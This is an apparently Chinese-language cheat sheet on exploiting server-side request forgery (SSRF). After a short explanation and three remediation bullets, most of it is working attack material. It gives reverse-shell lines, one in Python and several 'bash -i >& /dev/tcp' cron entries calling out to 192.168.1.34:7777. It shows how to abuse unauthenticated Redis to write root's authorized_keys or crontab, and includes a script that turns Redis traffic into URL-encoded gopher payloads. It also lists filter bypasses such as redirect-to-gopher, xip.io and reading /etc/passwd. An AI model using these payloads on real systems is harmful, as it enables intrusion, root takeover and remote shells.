ssrf漏洞，全称为服务端请求伪造漏洞，由于有的web应用需要实现从其它服务器上获取资源的功能，但是没有对url进行限制，导致可以构造非本意的url对内网或者其它服务器发起恶意请求。
ssrf漏洞的危害可以通过ssrf漏洞可以对内网或本地机器进行主机发现，服务版本探测或者针对内网或本地一些薄弱的应用进行攻击，同时利用ssrf漏洞还可以时服务器主动发起请求，从而做为一个攻击跳板或者绕过CDN找到其服务器的真实ip

大部分 PHP 并不会开启 fopen 的 gopher wrapper

file_get_contents 的 gopher 协议不能 URLencode

file_get_contents 关于 Gopher 的 302 跳转有 bug，导致利用失败

curl/libcurl 7.43 上 gopher 协议存在 bug（%00 截断），经测试 7.49 可用

curl_exec() //默认不跟踪跳转，

file_get_contents() // file_get_contents支持php://input协议

修复方案：

• 限制协议为HTTP、HTTPS

• 禁止30x跳转

• 设置URL白名单或者限制内网IP

*/1 * * * * python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("127.0.0.1",8080));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

curl -vvv 'dict://127.0.0.1:6379/info'

如果存在/root/.ssh目录，直接root权限写/root/.ssh/authorized_keys

如果不存在/root/.ssh目录，直接root写crontab定时任务

ssh-keygen -t rsa

(echo -e "\n\n"; cat ~/.ssh/id_rsa.pub; echo -e "\n\n") > /tmp/foo.txt

cat /tmp/foo.txt | redis-cli -h 192.168.1.100 -p 6379 -x set crackit

redis-cli -h 192.168.1.100 -p 6379

192.168.1.100:6379> config set dir /root/.ssh/
config get dir
config set dbfilename "authorized_keys"
save
quit

可进行利用的cron有如下几个地方：

/etc/crontab 这个是肯定的

/etc/cron.d/* 将任意文件写到该目录下，效果和crontab相同，格式也要和/etc/crontab相同。漏洞利用这个目录，可以做到不覆盖任何其他文件的情况进行弹shell。

/var/spool/cron/root centos系统下root用户的cron文件

/var/spool/cron/crontabs/root debian系统下root用户的cron文件

echo -e "\n\n* * * * * bash -i >& /dev/tcp/192.168.1.34/7777 0>&1\n\n" | redis-cli -h $ -p $ -x set aaa

redis-cli -h $ -p $ config set dir /etc/

redis-cli -h $ -p $ config set dbfilename crontab

redis-cli -h $ -p $ save

redis-cli -h $ -p $ quit

./rediscron.sh 127.0.0.1 

如果第一个字符是>或者< 那么丢弃该行字符串，表示请求和返回的时间。

如果前3个字符是+OK 那么丢弃该行字符串，表示返回的字符串。

将\r字符串替换成%0d%0a

空白行替换为%0a

0d------回车符号－－－－－－"/r"

0a------换行符号－－－－－－"/n"

Windows 在行尾使用 CRLF (carriage return/line feed, 0d 0a)
   UNIX 只使用 LF(0a)

#coding: utf-8

import sys

exp = ''

with open("payload.txt") as f:

    for line in f.readlines():

        if line[0] in '><+':

            continue

        # 判断倒数第2、3字符串是否为\r

        elif line[-3:-1] == r'\r':

            #如果该行只有\r，将\r替换成%0a%0d%0a

            if len(line) == 3:

                exp = exp + '%0a%0d%0a'

            else:

                line = line.replace(r'\r', '%0d%0a')

                # 去掉最后的换行符

                line = line.replace('\n', '')

                exp = exp + line

        # 判断是否是空行，空行替换为%0a

        elif line == '\x0a':

            exp = exp + '%0a'

        else:

            line = line.replace('\n', '')

            exp = exp + line

print exp

*3%0d%0a$3%0d%0aset%0d%0a$3%0d%0aaaa%0d%0a$57%0d%0a%0a%0a* * * * * bash -i >& /dev/tcp/192.168.1.34/7777 0>&1%0a%0a%0a%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$3%0d%0adir%0d%0a$5%0d%0a/etc/%0d%0a*4%0d%0a$6%0d%0aconfig%0d%0a$3%0d%0aset%0d%0a$10%0d%0adbfilename%0d%0a$7%0d%0acrontab%0d%0a*1%0d%0a$4%0d%0asave%0d%0a*1%0d%0a$4%0d%0aquit%0d%0a%0a

gopher://ip:6379/_+payload   注意要加_

@ （curl和parse_url解析host不同，curl(lib_url)取第一个@符号后的，parse_url取最后一个@符号后的）

添加端口号

短网址绕过(通过添加短网址，让其还是指向内网ip)

指向任意IP的域名http://xip.io

http://10.0.0.1.xip.io resolves to 10.0.0.1

www.10.0.0.1.xip.io resolves to 10.0.0.1

http://mysite.10.0.0.1.xip.io resolves to 10.0.0.1

foo.http://bar.10.0.0.1.xip.io resolves to 10.0.0.1

如果读取文件时如果限制必须为某个host，则file://localhost/etc/passwd也可以读取
IP限制绕过

十进制转换 八进制转换 十六进制转换 不同进制组合转换

协议限制绕过

当url协议限定只为http(s)时，可以利用follow redirect 特性

<?php header("Location:gopher://127.0.0.1:6379/_");?>

构造302跳转服务，

结合dict:// file:// gopher://